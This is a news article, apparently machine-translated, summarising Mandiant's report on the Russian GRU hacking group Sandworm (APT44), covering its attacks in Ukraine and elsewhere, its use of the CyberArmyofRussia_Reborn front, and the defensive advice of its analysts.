The formidable hacker group Sandworm has played a central role in supporting Russian military objectives in Ukraine over the past two years, even as it has stepped up cyber threat operations in other regions of strategic political, economic and military interest to Russia.
This is the result of analysis of threat actor activities conducted by Google Cloud security group Mandiant. They found that Sandworm – or APT44, as Mandiant has tracked it – is responsible for nearly all of the destructive and disruptive cyberattacks that have occurred in Ukraine since Russia’s invasion in February 2022.
In the process, the threat actor established itself as the leading cyber attack unit within Russia’s Main Intelligence Directorate (GRU) and among all Russian state-backed cyber groups, Mandiant assessed. No other cyber group appears as fully integrated with Russian military operators as Sandworm currently is, the security vendor noted in a report this week that offers a detailed look at the group’s tools, techniques and practices.
“APT44 operations are global in scope and reflect Russia’s wide-ranging national interests and ambitions,” Mandiant warned. “Even with an ongoing war, we have observed the group supporting access and espionage operations in North America, Europe, the Middle East, Central Asia and Latin America.”
One manifestation of Sandworm’s broadening global mandate was a series of attacks on three water and hydroelectric plants in the United States and France earlier this year by a hacker group called CyberArmyofRussia_Reborn, which Mandiant believes is controlled from Sandworm.
The attacks – which appear to have been more of a demonstration of capabilities than anything else – caused a system malfunction at one of the US water facilities attacked. In October 2022, a group Mandiant believes was APT44 deployed ransomware against logistics service providers in Poland in a rare case of deploying a disruptive capability against a NATO country.
Global mandate
Sandworm has been an active threat actor for more than a decade. He is known for numerous high-profile attacks such as the one in 2022 demolished sections of the Ukrainian power grid just before a Russian missile attack; THE 2017 NotPetya ransomware outbreakand an attack on the opening ceremony of Pyeongchang Olympic Games in South Korea. The group has traditionally targeted government and critical infrastructure organizations, including those in the defense, transportation and energy sectors. The US government and others have attributed the operation to a cyber unit within the Russian GRU. In 2020, the The US Department of Justice has indicted several Russian military officers for their alleged role in various Sandworm campaigns.
“APT44 has an extremely broad targeting mandate,” says Dan Black, principal analyst at Mandiant. “Organizations developing software or other technologies for industrial control systems and other critical infrastructure components should have APT44 at the center of their threat models.”
Gabby Roncone, senior analyst on Mandiant’s Advanced Practices team, includes media organizations among APT44/Sandworm’s targets, especially during elections. “There will be many key elections of great interest to Russia this year, and APT44 may try to be a key player in them,” says Roncone.
Mandiant itself monitored APT44 as a unit within Russian military intelligence. “We map out a complex external ecosystem that enables their operations, including state-owned research institutions and private companies,” adds Roncone.
In Ukraine, Sandworm attacks have increasingly focused on espionage activity with the aim of gathering intelligence to benefit Russian military forces on the battlefield, Mandiant said. In many cases, threat actors’ favorite tactic to gain initial access to targeted networks has been to exploit routers, VPNs, and other devices peripheral infrastructures. It’s a tactic the threat actor is using more and more after Russia’s invasion of Ukraine. While the group has amassed a large collection of bespoke attack tools, it has often relied on legitimate tools and techniques that live above ground to evade detection.
An elusive enemy
“APT44 is adept at flying under the detection radar. Creating detections for commonly abused open source tools and above-ground living methods is critical,” says Black.
Roncone also advocates that organizations map and maintain their network environments and segment networks where possible due to Sandworm’s propensity to target vulnerable edge infrastructure for initial entry and re-entry into environments. “Organizations should also be wary of APT44 rotating between espionage and jamming targets after gaining access to networks,” Roncone notes. “For those working in the media and media organizations in particular, digital security training for individual journalists is crucial.”
Black and Roncone perceive APT44/Sandworm’s use of hacking fronts such as CyberArmyofRussia_Reborn as an attempt to draw attention to its campaigns and for denial purposes.
“We have seen APT44 repeatedly use the CyberArmyofRussia_Reborn Telegram to publish evidence and draw attention to its sabotage activity,” says Black. “We cannot definitively determine whether this is an exclusive relationship, but we believe that APT44 has the ability to direct and influence what the person posts on Telegram.”
Black says APT44 could use characters like CyberArmyofRussia_Reborn as a way to avoid direct attribution if they cross a line or provoke a response. “But the second [motive] it is that they create a false sense of popular support for Russia’s war – a false impression that the average Russian is organizing to join the cyber fight against Ukraine.”